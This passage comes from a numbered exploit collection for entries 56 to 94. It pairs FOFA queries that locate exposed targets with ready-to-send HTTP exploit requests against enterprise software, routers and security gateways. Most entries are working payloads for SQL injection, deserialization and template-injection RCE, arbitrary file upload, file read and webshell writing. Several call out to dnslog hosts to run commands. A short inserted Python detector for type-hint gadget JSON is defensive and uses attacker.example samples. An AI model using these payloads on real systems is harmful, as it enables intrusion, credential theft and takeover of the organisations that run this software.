Step 1: obtain a Cookie via the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

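Added example for the deserialization entries 21, 23, 54 and 56 (not from the original compilation). All four work the same way: the JSON carries a type discriminator, @type for fastjson and __type for Ajax.NET, that makes the server instantiate a class the client picked. A request-side check therefore looks for those keys anywhere in the body and rates what they name. One caveat comes straight from entry 23: that payload is not valid JSON and only parses because fastjson is lenient, so a strict parser has to fall back to a text scan instead of reporting the request as unparseable and letting it through. The sample bodies are constructed from the shapes above; attacker.example is a placeholder host.

```python
import json
import re

# Keys that tell a polymorphic deserializer which class to instantiate.
TYPE_KEYS = {"@type", "__type"}

# Classes named by the payloads on this page. The list is what the detector
# rates "critical"; any other declared type is still "suspicious".
DANGEROUS_TYPES = (
    "java.net.URL",                            # fastjson: outbound lookup via hashCode
    "System.Windows.Data.ObjectDataProvider",  # .NET: invokes an arbitrary method
    "System.Diagnostics.Process",              # .NET: Process.Start
)


def _walk(node, path, out):
    """Depth-first walk collecting every type-discriminator key with its JSON path."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = path + "/" + str(key)
            if key in TYPE_KEYS and isinstance(value, str):
                out.append((here, value))
            _walk(value, here, out)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            _walk(value, path + "/" + str(index), out)


_RAW_TYPE = re.compile(r'"(@type|__type)"\s*:\s*"([^"]*)"')


def find_type_hints(body: str) -> list:
    """Return [(json_path, declared_type)] for every @type/__type in the body.

    json.loads is strict; fastjson and Ajax.NET are lenient, so when strict
    parsing fails the raw text is scanned instead and the path is reported as
    "?" rather than dropping the request as unparseable.
    """
    try:
        document = json.loads(body)
    except ValueError:
        return [("?", m.group(2)) for m in _RAW_TYPE.finditer(body)]
    found = []
    _walk(document, "", found)
    return found


def classify(hints) -> str:
    """"critical" if a known gadget class is named, "suspicious" if any type hint
    is present at all (no honest client needs to pick server-side classes),
    otherwise "clean"."""
    if not hints:
        return "clean"
    for _, declared in hints:
        base = declared.split(",", 1)[0].strip()   # drop .NET assembly qualification
        if base in DANGEROUS_TYPES:
            return "critical"
    return "suspicious"


# Constructed sample bodies (shapes from the entries above, not real captures).
SAMPLES = {
    # entry 56 shape, valid JSON: ObjectDataProvider -> Process.Start
    "ajaxnet": '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
               'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
               '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
               'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
               '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
               'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping attacker.example"}}}}',
    # entry 23 shape, deliberately malformed: relies on fastjson leniency
    "fastjson": '{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                '{"@type":"java.net.URL","val":"http://attacker.example"}}""}',
    "benign": '{"storeID":{"id":42,"name":"main warehouse"}}',
}
```

Rating any type hint as at least suspicious is the useful default: on both stacks the fix is to stop honouring client-chosen types (fastjson autoType off, Ajax.NET type binding restricted), after which a legitimate request never carries these keys.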
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Entsoft) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 1670

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 (Superdata) software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QAX) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
